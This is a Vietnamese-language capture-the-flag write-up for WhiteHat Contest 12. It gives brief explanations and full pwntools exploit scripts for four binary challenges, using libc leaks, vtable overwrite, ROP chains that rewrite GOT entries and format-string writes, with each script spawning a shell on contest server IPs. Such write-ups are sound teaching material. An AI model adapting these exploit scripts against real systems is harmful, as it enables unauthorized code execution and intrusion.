[WhiteHat Contest 12] Writeup

Lâu lâu quay lại nghịch với anh em chút
Pwn002: Expression
- Trong bài này chúng ta có thể leak được địa chỉ main ret -> địa chỉ libc_base -> addr_system
- Leak địa chỉ stack
- Ghi đè vtable -> điều khiển EIP -> stackpivots -> system('sh')
stackpivots được ghi trên stack -> cần leak addr_stack -> ghi đè vtable
POC:

#!/usr/bin/python
# coding: utf-8

import sys
from pwn import *
import re

bufOff = 0x38
addOff = 0x138
addAddrSaveOff = 0x1A8 # => n = 106

printfGOT = 0x0804A00C

# offset = 0x230
# %200p%139hhn
# dien duoc: aaa%XXXp, %XXX$hhn
# can dien 
'''
IEEE 754 double-precision binary floating-point format:
sign bit: 1 bit
exponent width: 11 bits
significand precision: 52 bits
=> (-1)^sign * (1....) * 2^(e-1023)
'''

r = remote("103.237.99.238", 23502)

#leak address of Add in funcs
# C0%106$p
double106 = '15689493888545425171517553939538593962630452632735318932641431496326099575491110895940331523824938734415041889575484758388023300971288190716793723346016069788186453976804505990687847103392041472148862834466375699924634690077656612864'
y = 1
expr = double106+'+'+str(y)
r.recvuntil('(type q to quit): ')
r.sendline(expr + 'A'*(addOff - bufOff - len(expr)) + p32(printfGOT))
leaked = r.recvuntil('(type q to quit): ')
g = re.search(r'\x0c\xa0\x04\x08C0(.*?)Your result', leaked)
addAddr = int(g.group(1), 16)
print('addAddr = 0x%x' % addAddr)

#leak address of libcStartMain
double115 = '15686473471419443415090071412610203931566682293270255779291818625005782169844328775380529476139305610239952058251267775175227480712871066711134098916274130234425947262793234958538224623779034440872690638537463363960191653609549594624'
y = 1
expr = double115+'+'+str(y)
r.sendline(expr + 'A'*(addOff - bufOff - len(expr)) + p32(printfGOT))
leaked = r.recvuntil('(type q to quit): ')
g = re.search(r'\x0c\xa0\x04\x08C0(.*?)Your result', leaked)
libcStartMain243Addr = int(g.group(1), 16)
print('libcStartMain = 0x%x' % libcStartMain243Addr)

libc = ELF('/libcdatabase/db/libc6_2.19-0ubuntu6.9_i386.so') # -------------------------------------- have to fill -----------------
systemOff = libc.symbols['system']
libcStartMain243Off = libc.symbols['__libc_start_main']+243
libcBase = libcStartMain243Addr - libcStartMain243Off
systemAddr = libcBase + systemOff

# ;sh;aaaa
doublesh = '122176368510236856069316127282813742001639096947399384047193436306127371752849322764559939080275836101485223194845042045900068357294380797415881218516438099165184.000000'
y = 1
expr = doublesh+'+'+str(y)
r.sendline(expr + 'A'*(addOff - bufOff - len(expr) - 4)+p32(systemAddr)+p32(addAddr-4))

r.interactive()

 

Pwn003: Readfile
Chương trình này có khả năng đọc file nhưng bị lỗi ở hàm fread

Hàm fread gây ra lỗi tràn bộ đệm do không kiểm soát size (n) . Nhưng ta không thể ghi đè vào main ret được do nếu ghi đè thì ta phải ghi đè vào cấu trúc file trên stack trước -> fclose(stream) sẽ bị lỗi trước khi trả về hàm main
Do đó chúng ta chỉ cần:
- Ghi đè cấu trúc file -> điều khiển EIP
- Dùng ROP gadgets ghi đè system vào GOT
- And Submit :3
POC

#!/usr/bin/python
# coding: utf-8

from pwn import *
import time


#r = process('./readfile')
r = remote("103.237.99.25", 23504)

'''

'''
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('/libcdatabase/db/libc6_2.19-0ubuntu6.9_i386.so')

G1 = 0x080486be # add dword ptr [ebx + 0x5d5b04c4], eax; ret;
G2 = 0x080486c2 # pop ebx; pop ebp; ret;
G3 = ''     # pop eax; ret
G4 = 0x08048a73 # mov eax, dword [esp+0x34] ; mov dword [esp+0x04], eax ; call dword [ebx+esi*4-0x000000E0];...add esp,0x1c; pop ebx; pop esi; pop edi; pop ebp ; ret
G5 = 0x08048524 # pop ebx; ret;
G6 = 0x08048a8d # pop esi; pop edi; pop ebp; ret; 
G7 = 0x080486b8 # mov byte ptr [0x804a084], 1; add esp, 4; pop ebx; pop ebp; ret;
dummy = 0xdeadbeef
esi = 0x01020101
edi = 0x01020102
ebx = 0x3fc9c18 #ebx = 0x8049f3c - (esi*4) + 0xe0, 0x8049f3c chứa địa chỉ của _fini
off_sys_puts = libc.symbols['system'] + 0x100000000 - libc.symbols['puts']
print(hex(off_sys_puts))
#exit(0)
got_puts = 0x0804a01c
addr_name=0x804a0a0
rop = ''
rop += p32(G7)
rop += p32(dummy)
rop += p32(dummy)
rop += p32(dummy)
rop += p32(G6)
rop += p32(esi)
rop += p32(edi)
rop += p32(dummy)
rop += p32(G5)
rop += p32(ebx)
rop += p32(G4)
for i in range(0,11):
    rop+=p32(dummy)
rop += p32(G2)
rop += p32((got_puts - 0x5d5b04c4) & 0xFFFFFFFF )
rop += p32(off_sys_puts)
rop += p32(G1)
rop += p32(0x80485b0) # puts_plt->sys
rop += p32(addr_name+8+4)*2


name = '/tmp/aaa'
name += p32(0x30318010) # chỉ cần thỏa mãn & 0x20 == 0 và & 0x8000 != 0
name +='sh\x00\x00'
name +=p32(0x080486f1) # leave ret
name +='\x00'*(0x94+8-len(name)) # thỏa mãn dword [addr_name+0x46] == 0
name +=p32(addr_name+8)

print name
r.recvuntil('exit\n')
r.sendline('1')
r.recvuntil('file name: ')
r.sendline(name)
r.recvuntil('Give me the size: ')
r.sendline('195')
r.recvuntil('Give me the buffer: ')
payload = 'A'*0x104+p32(addr_name+8)+'B'*12+rop
print hex(len(payload))
r.sendline(payload)
#r.sendline('B'*10)
r.close()
time.sleep(1)

#r= process('./readfile')
r = remote("10.2.32.84", 23504)

r.recvuntil('exit\n')
r.sendline('2')
#time.sleep(1)
r.recvuntil('file name: ')
r.sendline(name)
#print 'xxx'
time.sleep(1)
r.interactive()

 

Pwn004: note

#!/usr/bin/python
from pwn import *


adminPassAddr = 0x0804A3C0
sampleDestAddr = 0xffffd6a4
sampleEsp = 0xffffd57c

#r = process('./note')
r = remote("103.237.99.74", 23509)
r.recvuntil('> ')
r.sendline('add')
r.sendline('name')
r.sendline('date')
r.sendline('a'*296+p32(adminPassAddr))
mStr = r.recvuntil('terminated')
password = re.search(r'\: (.*?) terminated', mStr).group(1)
r.close()

#r = process('./note')
r = remote("103.237.99.74", 23509)


e=ELF('/libcdatabase/db/libc6_2.19-0ubuntu6.9_i386.so')
main_ret_offset = e.symbols['__libc_start_main']+243

rop = ROP(e)

r.sendline('login')
r.sendline(password)
#leak base
r.sendline('game')
r.recvuntil("Enter exit To Quit Game.\nStart :")
r.sendline('ZZZZ%55$p')
r.recvuntil('ZZZZ')
main_ret = int(r.recvline(),16)
print hex(main_ret)
base = main_ret-main_ret_offset
print hex(base)
#exit(0)
spv80=base+rop.pivots[80]
log.info('Spivot80 : 0x%x'%(spv80))
#send data
r.recvuntil('Enter text : ')
r.sendline('A'*48+p32(base+e.symbols['system'])+'AAAA'+p32(base+e.search('sh\x00').next()))
#overwrite
p1 = int(hex(spv80)[2:6],16)
p2 = int(hex(spv80)[6:10],16)
got_printf = 0x0804a314
over_printf = p32(got_printf)+p32(got_printf+2)+'%'+str(p2-8)+'x%6$hn'+'%'+str(p1-p2)+'x%7$hn'
r.recvuntil('Enter text : ')
r.sendline(over_printf)

r.interactive()
r.close()

Pwn005: fmt

#!/usr/bin/python
# coding: utf-8

from pwn import *
sampleRsp = 0x7fffffffe120
sampleRbp = 0x7fffffffe530
sampleStack = 0x00007fffffffe610


libc = ELF("/libcdatabase/db/libc6_2.19-0ubuntu6.9_amd64.so")
r = remote("103.237.99.75", 23505)


print(r.recvuntil("Give me a name"))
payload = "%134$p %135$p %136$p %137$p" #leak
r.sendline(payload)
print(payload)
mStr = r.recvall()
leakeds = mStr.strip().split(' ')
print(mStr)

leakedStack = int(leakeds[0], 16)
leakedLibc = int(leakeds[3], 16)

libcOffset = libc.symbols['__libc_start_main']+245

stackBase = leakedStack - sampleStack
print("stackBase="+hex(stackBase))
libcBase = leakedLibc - libcOffset
print("leaked libc = "+hex(leakedLibc))
print("libc base = "+hex(libcBase))
rPopRdiRet = 0x00000000004008d3 # pop rdi; ret (in fmt)
shAddr = libcBase + libc.search("sh\x00").next()
systemAddr = libcBase + libc.symbols["system"]

r.close()


r = remote("103.237.99.75", 23505)
print(r.recvuntil("Give me a name"))

pivot24 = 0x4008D0 # pop; pop; ret
popRdiRet = 0x4008d3 # pop rdi; ret
n = 0xD0 # = 208

payload = "%208p"
payload += "%11$hhn"
payload += 'aaab'
payload += p64(popRdiRet)
payload += p64(shAddr)
payload += p64(systemAddr)
payload += p64(stackBase+sampleRsp-8)
print(payload)
r.sendline(payload)
r.interactive()